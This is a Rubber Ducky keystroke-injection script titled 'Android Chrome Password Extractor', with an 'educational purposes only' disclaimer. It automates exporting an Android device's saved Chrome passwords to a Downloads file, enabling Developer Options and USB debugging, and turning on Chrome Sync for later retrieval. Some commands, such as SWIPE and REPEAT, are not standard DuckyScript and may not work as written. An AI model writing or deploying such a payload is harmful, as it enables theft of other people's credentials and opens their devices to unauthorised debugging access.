REM Android Chrome Password Extractor
REM Author: Cascade
REM Version: 1.0
REM Disclaimer: For educational purposes only

REM Give the device a moment to recognize the Rubber Ducky
DELAY 1000

REM Wake up the device
ENTER
DELAY 500

REM Swipe up to unlock (may need adjustment based on device)
DELAY 1000
SWIPE 500 1500 500 500

REM Wait for device to unlock
DELAY 1000

REM Open Chrome browser
GUI SPACE
DELAY 500
STRING Chrome
DELAY 500
ENTER
DELAY 2500

REM Navigate to Chrome password settings
REM Open menu
ALT f
DELAY 800

REM Navigate to Settings
STRING s
DELAY 800

REM Tap on Passwords
DELAY 800
STRING password
DELAY 500
ENTER
DELAY 1500

REM Navigate to Password export (may vary by Chrome version)
STRING export
DELAY 600

REM Tap on Export Passwords
DELAY 1000
ENTER
DELAY 1500

REM Confirm the export
ENTER
DELAY 2000

REM For newer Android versions, handle system file selection dialog
REM Navigate to Downloads folder
DELAY 1000
STRING Download
DELAY 500
ENTER
DELAY 1000

REM Save the file
STRING chrome_passwords
DELAY 500
ENTER
DELAY 3000

REM ---- Alternative method: ADB backup approach ----
REM Open Settings to enable Developer options if not already enabled
HOME
DELAY 500
GUI SPACE
DELAY 500
STRING Settings
DELAY 500
ENTER
DELAY 1500

REM Navigate to About Phone
STRING about
DELAY 500
ENTER
DELAY 1000

REM Tap on Build Number 7 times to enable Developer Options
REPEAT 7 {
    DELAY 300
    STRING build
    DELAY 300
    ENTER
}
DELAY 1000

REM Go back to Settings
BACK
DELAY 500

REM Open Developer Options
STRING developer
DELAY 500
ENTER
DELAY 1000

REM Enable USB debugging
STRING debug
DELAY 500
ENTER
DELAY 800
ENTER
DELAY 1000

REM Return to home screen
HOME
DELAY 500

REM ---- Method 3: Chrome Sync approach ----
REM Open Chrome again
GUI SPACE
DELAY 500
STRING Chrome
DELAY 500
ENTER
DELAY 2500

REM Open menu
ALT f
DELAY 800

REM Navigate to Settings
STRING s
DELAY 800

REM Tap on Sync
DELAY 500
STRING sync
DELAY 500
ENTER
DELAY 1000

REM Enable Sync if not already enabled
ENTER
DELAY 1000

REM This syncs passwords to Google account for later retrieval
DELAY 2000

REM Return to home screen
HOME
DELAY 500

REM ---- Final step: Open file manager to verify the export worked ----
GUI SPACE
DELAY 500
STRING Files
DELAY 500
ENTER
DELAY 1500

REM Navigate to Downloads folder
STRING download
DELAY 500
ENTER
DELAY 1000

REM The password file should be visible here
DELAY 3000

REM End of script
HOME
